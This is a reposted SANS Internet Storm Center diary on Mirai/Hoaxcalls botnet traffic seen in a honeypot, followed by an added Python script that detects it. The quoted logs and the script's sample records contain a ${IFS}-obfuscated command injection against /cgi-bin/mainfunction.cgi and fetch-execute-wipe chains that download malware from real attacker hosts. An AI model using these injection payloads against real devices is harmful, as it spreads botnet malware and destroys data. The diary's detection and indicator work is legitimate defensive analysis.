
Mirai Botnet Activity, (Sat, Jun 13th)

This past week, I noticed new activity from the Mirai botnet in my honeypot. The IP and file associated with the first log below, which appeared multiple times this week including today, appear to have been taken down. However, the last two logs from today are still active: they use a Bash script to download multiple exploits targeting various device types (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Something else of interest is the User-Agent "XTC" and the name "viktor", which appear to be linked to the XTC IRC botnet, aka Hoaxcalls.

  • 20200613-025717: data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'
  • 20200613-101614: data 'cd /tmp; wget; chmod 777; sh; rm -rf *\r\n\r\n'
  • 20200613-101617: data 'cd /tmp; wget; chmod 777; sh; rm -rf *\r\n\r\n'
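The three records above show the two patterns worth alerting on from the defender's side: the `${IFS}` whitespace substitution used to smuggle a shell command through the `keyPath` parameter of `/cgi-bin/mainfunction.cgi`, and the bare "cd /tmp; wget; chmod 777; sh; rm -rf *" fetch-execute-wipe chain. The following Python checker is an added example, not code from the diary or from the ISC honeypot: it undoes the `${IFS}` trick, extracts and defangs any URLs, and tags each record with the indicators it matches. The sample records are constructed to mirror the entries above; the wget URLs in them are filled in from this post's IoC list purely for illustration (the honeypot output above does not show them), and the third record is a benign control.

```python
"""Flag Mirai/Hoaxcalls-style command-injection attempts in honeypot HTTP logs (added example)."""
import re
from urllib.parse import urlsplit

# Hosts taken from the diary's Indicators of Compromise section.
KNOWN_IOC_HOSTS = {"96.30.193.26", "185.172.111.214"}

# Constructed sample records modelled on the diary's entries. Timestamps and request
# shapes follow the post; the wget URLs are assumed here for illustration only.
SAMPLE_RECORDS = [
    ("20200613-025717",
     "POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 189\r\n"
     "Accept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n"
     "action=login&keyPath='wget${IFS}http://185.172.111.214/8UsA.sh${IFS}-O${IFS}"
     "/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'"
     "&loginUser=a&loginPwd=a\r\n\r\n"),
    ("20200613-101614",
     "cd /tmp; wget http://96.30.193.26/arm7; chmod 777 arm7; sh arm7; rm -rf *\r\n\r\n"),
    ("20200613-120000",  # benign control record, constructed
     "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: example.test\r\n\r\n"),
]

# URL matcher applied to the *normalised* text so ${IFS} never bleeds into a URL.
URL_RE = re.compile(r"https?://[^\s'\";&<>${}]+", re.IGNORECASE)


def normalize_ifs(payload: str) -> str:
    """Replace ${IFS}/$IFS with a space so the injected shell command reads normally."""
    text = re.sub(r"\$\{IFS\}|\$IFS\b", " ", payload)
    return re.sub(r"[ \t]+", " ", text).strip()


def defang(url: str) -> str:
    """Write the host with its last dot bracketed, as in the diary's IoC list."""
    host = urlsplit(url).hostname or ""
    head, _, tail = host.rpartition(".")
    return url.replace(host, f"{head}[.]{tail}", 1) if tail else url


# Each check receives the raw record and its ${IFS}-normalised form.
INDICATORS = {
    "ifs-obfuscation": lambda raw, norm: "${IFS}" in raw or "$IFS" in raw,
    "xtc-user-agent": lambda raw, norm: re.search(r"User-Agent:\s*XTC\b", raw) is not None,
    "mainfunction-cgi": lambda raw, norm: "/cgi-bin/mainfunction.cgi" in raw,
    "viktor-dropper": lambda raw, norm: "/tmp/viktor" in norm,
    "tmp-fetch-exec-wipe": lambda raw, norm: re.search(
        r"cd /tmp.*wget .*chmod 777.*rm -rf", norm) is not None,
}


def analyze_record(timestamp: str, data: str) -> dict:
    """Tag one honeypot record with the indicators it matches and the defanged URLs it carries."""
    norm = normalize_ifs(data)
    hits = [name for name, check in INDICATORS.items() if check(data, norm)]
    urls = URL_RE.findall(norm)
    if any((urlsplit(u).hostname or "") in KNOWN_IOC_HOSTS for u in urls):
        hits.append("known-ioc-host")
    return {"timestamp": timestamp, "indicators": sorted(hits), "urls": [defang(u) for u in urls]}


def analyze(records) -> list:
    """Return only the records that tripped at least one indicator."""
    return [r for r in (analyze_record(ts, d) for ts, d in records) if r["indicators"]]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_RECORDS):
        print(finding["timestamp"], ", ".join(finding["indicators"]), finding["urls"])
```

The normalisation step matters more than the string matches: a signature written against the raw request ("wget -O /tmp/viktor") never fires on the `${IFS}`-separated form, while a rule on the normalised text catches both. The benign control record produces no finding, which is the sanity check to keep when tuning the indicator list against live honeypot data.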

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspicious Files and Scripts:

  • UnHAnaAW.sh4 – 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1
  • – 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS.
